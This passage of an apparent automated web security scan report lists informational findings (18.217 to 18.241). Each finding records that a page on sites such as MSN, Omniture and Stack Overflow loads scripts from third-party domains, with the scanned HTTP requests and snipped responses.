Date: Wed, 02 Feb 2011 15:38:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
MSN Music:
...[SNIP]...
</SCRIPT>
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

18.217. http://music.msn.com/music/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://music.msn.com
Path:	/music/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET /music/article.aspx?news=626003&gt1=28102 HTTP/1.1
Host: music.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.218. https://my.omniture.com/login/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/login/

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.omniture-static.com/js/ext/ext-base/ext-base-mbox38-proto1.6.0.2.js?l=en_US&version=-752251553
https://www.omniture-static.com/js/ext/ext-base/opth.21.survey.js

Request

GET /login/ HTTP/1.1
Host: my.omniture.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 18:59:54 GMT
Server: Omniture AWS/2.0.0
xserver: www476
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 52053

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<!--[if IE 9]
...[SNIP]...
</script>
<script charset="utf-8" src="https://www.omniture-static.com/js/ext/ext-base/ext-base-mbox38-proto1.6.0.2.js?l=en_US&version=-752251553"></script>
...[SNIP]...
<body id='bodyid' class="yui-skin-sam" >
<script type="text/javascript" charset="utf-8" src="https://www.omniture-static.com/js/ext/ext-base/opth.21.survey.js"></script>
...[SNIP]...

18.219. https://my.omniture.com/p/suite/1.2/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/p/suite/1.2/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.omniture-static.com/js/ext/ext-base/ext-base-mbox38-proto1.6.0.2.js
https://www.omniture-static.com/js/ext/ext-base/opth.21.survey.js

Request

Response

18.220. http://nationalcybersecurity.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nationalcybersecurity.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: nationalcybersecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.221. http://outsideonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://outsideonline.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://btn.clickability.com/722497/button_2/button.js
http://feed2js.org/feed2js.php?src=http://api.clickability.com/api?encq=WY0NWau9WPw1nLzJyckZXZ0NTPycjM5QyN0ZXelBUPmUGdtlTZk1nJlZnc9MnczNzXuIAM%3D%3D&desc=1
http://feed2js.org/feed2js.php?src=http://api.clickability.com/api?encq=WY0NWau9WPw1nLzJyckZXZ0NTPycjM5QyN0ZXelBVPmYGdtlTZk1nJlZnc9MnczNzXuIAM%3D%3D&desc=1
http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://widgets.twimg.com/j/2/widget.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET / HTTP/1.1
Host: outsideonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:38:22 GMT
Server: Apache/2.2.9 (Unix) mod_jk/1.2.15
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSION_OO=4D016841016079F74267BAA86260494D; Path=/
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive
Set-Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e34a3745525d5f4f58455e445a4a423660;path=/
Set-Cookie: NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660;path=/
Content-Length: 92077


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="
...[SNIP]...
</script>


       <script language="javascript1.2" src="http://btn.clickability.com/722497/button_2/button.js"></script>
...[SNIP]...
</form><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<div style="float: left; margin-right: 10px;">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div style="float: left;">
<script src="http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...
<div id="mostpopularread" style="display:block;">
               <script language="JavaScript" src="http://feed2js.org//feed2js.php?src=http://api.clickability.com/api?encq=WY0NWau9WPw1nLzJyckZXZ0NTPycjM5QyN0ZXelBVPmYGdtlTZk1nJlZnc9MnczNzXuIAM%3D%3D&desc=1" type="text/javascript"></script>
...[SNIP]...
<div id="mostpopularemailed" style="display:none;">
               <script language="JavaScript" src="http://feed2js.org//feed2js.php?src=http://api.clickability.com/api?encq=WY0NWau9WPw1nLzJyckZXZ0NTPycjM5QyN0ZXelBUPmUGdtlTZk1nJlZnc9MnczNzXuIAM%3D%3D&desc=1" type="text/javascript"></script>
...[SNIP]...

18.222. http://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/lh/view

Issue detail

The response dynamically includes the following script from another domain:

http://lh3.ggpht.com/s/v/71.12/script/lh_searchview.js

Request

GET /lh/view?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.223. https://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://picasaweb.google.com
Path:	/lh/view

Issue detail

The response dynamically includes the following script from another domain:

https://lh3.googleusercontent.com/s/v/71.12/script/lh_searchview.js

Request

Response

18.224. http://pressroom.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pressroom.orbitz.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/152/addthis_widget.js

Request

GET / HTTP/1.1
Host: pressroom.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.225. https://publish.omniture.com/center/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://publish.omniture.com
Path:	/center/

Issue detail

The response dynamically includes the following script from another domain:

https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

Request

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:00:33 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 publish.omniture.com:88
X-Cache: MISS from publish.omniture.com
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
X-Pad: avoid browser bug
Content-Length: 10244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Copyright (c) 2011 Adobe Systems Incorporated. All ri
...[SNIP]...
</table>

<script type="text/javascript" src="https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js"></script>
...[SNIP]...

18.226. https://publish.omniture.com/center/util/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://publish.omniture.com
Path:	/center/util/

Issue detail

The response dynamically includes the following script from another domain:

https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

Request

GET /center/util/ HTTP/1.1
Host: publish.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; v1stsp=C92D8F8B772AFF13; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:21:26 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 publish.omniture.com:88
X-Cache: MISS from publish.omniture.com
Connection: close
Content-Length: 2895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Copyright (c) 2011 Adobe Systems Incorporated. All rights reser
...[SNIP]...
</table>

<script type="text/javascript" src="https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js"></script>
...[SNIP]...

18.227. http://realestate.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.msn.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET / HTTP/1.1
Host: realestate.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.228. http://realestate.msn.com/slideshow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.msn.com
Path:	/slideshow.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js

Request

GET /slideshow.aspx HTTP/1.1
Host: realestate.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.229. http://script.aculo.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://script.aculo.us
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.getclicky.com/js

Request

GET / HTTP/1.1
Host: script.aculo.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Wed, 02 Feb 2011 15:41:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.7
Content-Length: 13642

<!DOCTYPE html>
<html>
<head>
<title>script.aculo.us - web 2.0 javascript</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<link rel="alternate" type="application/rs
...[SNIP]...
</center>

<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...

18.230. https://secure.avangate.com/order/checkout.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.avangate.com
Path:	/order/checkout.php

Issue detail

The response dynamically includes the following script from another domain:

https://3619-avangate.voxcdn.com/content/static/js/order/fbd0228cbfaabeb6575937ad4e7cca9e/20110127123524.js?20110127133221

Request

Response

18.231. https://secure.avangate.com/order/nojs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.avangate.com
Path:	/order/nojs.php

Issue detail

The response dynamically includes the following script from another domain:

https://3619-avangate.voxcdn.com/content/static/js/order/fbd0228cbfaabeb6575937ad4e7cca9e/20110127123524.js?20110127133221

Request

GET /order/nojs.php HTTP/1.1
Host: secure.avangate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=mhap601shf0fv6lib5ejliho2q6t64ul;

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Thu, 03 Feb 2011 06:56:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 14336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...

<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/fbd0228cbfaabeb6575937ad4e7cca9e/20110127123524.js?20110127133221"></script>
...[SNIP]...

18.232. https://sitesearch.omniture.com/center/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sitesearch.omniture.com
Path:	/center/

Issue detail

The response dynamically includes the following script from another domain:

https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

Request

Response

18.233. https://sitesearch.omniture.com/center/util/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sitesearch.omniture.com
Path:	/center/util/

Issue detail

The response dynamically includes the following script from another domain:

https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

Request

GET /center/util/ HTTP/1.1
Host: sitesearch.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; v1stsp=C92D8F8B772AFF13; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:21:49 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 sitesearch.omniture.com:86
X-Cache: MISS from sitesearch.omniture.com
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Copyright (c) 2011 Adobe Systems Incorporated. All rights reserve
...[SNIP]...
</table>

<script type="text/javascript" src="https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js"></script>
...[SNIP]...

18.234. http://spoofem.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spoofem.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.stocktrader.org.uk/remote2/ST1-

Request

GET / HTTP/1.1
Host: spoofem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.235. http://stackoverflow.com/questions/1890512/handling-errors-in-jquerydocument-ready previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/questions/1890512/handling-errors-in-jquerydocument-ready

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://edge.quantserve.com/quant.js
http://sstatic.net/Js/wmd.js?v=b829ef33b935
http://sstatic.net/js/master.min.js?v=24dd3bec5bd9
http://sstatic.net/js/question.js?v=d502cec6be8f

Request

GET /questions/1890512/handling-errors-in-jquerydocument-ready HTTP/1.1
Host: stackoverflow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Wed, 02 Feb 2011 15:43:08 GMT
Last-Modified: Wed, 02 Feb 2011 15:42:08 GMT
Vary: *
Date: Wed, 02 Feb 2011 15:42:07 GMT
Connection: close
Content-Length: 47677

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>javascript - Handling errors in jQuery(document).ready - Stack Overflow
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=24dd3bec5bd9"></script>
...[SNIP]...
<link rel="alternate" type="application/atom+xml" title="Feed for question 'Handling errors in jQuery(document).ready'" href="/feeds/question/1890512">

<script src="http://sstatic.net/js/question.js?v=d502cec6be8f" type="text/javascript"></script>
...[SNIP]...
</h2>

<script src="http://sstatic.net/Js/wmd.js?v=b829ef33b935" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.236. http://technolog.msnbc.msn.com/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.msn.com
Path:	/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar HTTP/1.1
Host: technolog.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.237. http://technolog.msnbc.msn.com/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.msn.com
Path:	/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23279
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/007eb2f4e0ab5688a998bec9c2de18c62b55711a.js?v=23279
http://www.polls.newsvine.com/_static/js/642cd324ca8ed58d25f3d48637d36eb9aeeed9db.js?v=23279
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23279
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23279
http://www.polls.newsvine.com/_vine/js/pierre?v=2673&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

Response

18.238. http://technolog.msnbc.msn.com/_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.msn.com
Path:	/_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing HTTP/1.1
Host: technolog.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.239. http://technolog.msnbc.msn.com/_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.msn.com
Path:	/_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23279
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/007eb2f4e0ab5688a998bec9c2de18c62b55711a.js?v=23279
http://www.polls.newsvine.com/_static/js/7b06da0c3220039feac344caa9644a2be2ffbde5.js?v=23279
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23279
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23279
http://www.polls.newsvine.com/_vine/js/pierre?v=2673&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

Response

18.240. http://thebubble.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thebubble.msn.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET / HTTP/1.1
Host: thebubble.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:13 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html
Content-Length: 25548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta htt
...[SNIP]...

<script src="http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...

18.241. http://today.msnbc.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://today.msnbc.msn.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.pulse360.com/03ECD8C4-A960-11DF-9090-D37F3FF5047F
http://content.pulse360.com/288F6A98-A95B-11DF-B5E2-BA6C3FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery
http://www.polls.newsvine.com/_vine/js/pierre?v=2442&lib=jquery&addwidgets=zinger,wetbar

Request

GET / HTTP/1.1
Host: today.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: no-cache
Expires: Wed, 02 Feb 2011 15:42:13 GMT
Date: Wed, 02 Feb 2011 15:42:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 215942

<html><head><title>TODAYshow.com: Matt Lauer, Meredith Vieira, Ann Curry, Al Roker, Natalie Morales - Video, News, Recipes, Health, Pets</title><link rel="stylesheet" type="text/css" href="/css/html40
...[SNIP]...
</script><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/03ECD8C4-A960-11DF-9090-D37F3FF5047F" type="text/javascript"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/288F6A98-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...
